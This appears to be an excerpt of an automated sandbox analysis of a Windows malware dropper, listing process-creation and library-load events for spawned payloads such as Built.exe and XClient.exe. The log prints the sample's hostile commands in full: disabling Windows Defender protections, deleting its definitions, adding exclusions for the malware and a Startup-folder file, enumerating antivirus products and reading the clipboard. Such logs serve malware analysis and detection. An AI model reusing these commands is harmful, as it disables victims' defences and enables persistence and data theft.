                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: unknownProcess created: C:\Windows\SysWOW64\it-IT\dasHost.exe C:\Windows\SysWOW64\it-IT\dasHost.exe
                        Source: unknownProcess created: C:\Windows\SysWOW64\it-IT\dasHost.exe C:\Windows\SysWOW64\it-IT\dasHost.exe
                        Source: unknownProcess created: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe "C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe"
                        Source: unknownProcess created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
                        Source: unknownProcess created: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe "C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Brokercrt\comReviewsession.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\svchosts.exe "C:\Users\user\AppData\Local\Temp\svchosts.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\S l r .exe "C:\Users\user\AppData\Local\Temp\S l r .exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"
                        Source: C:\Brokercrt\comReviewsession.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: python3.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libffi-8.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: sqlite3.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libcrypto-1_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: libssl-1_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeSection loaded: profapi.dllJump to behavior
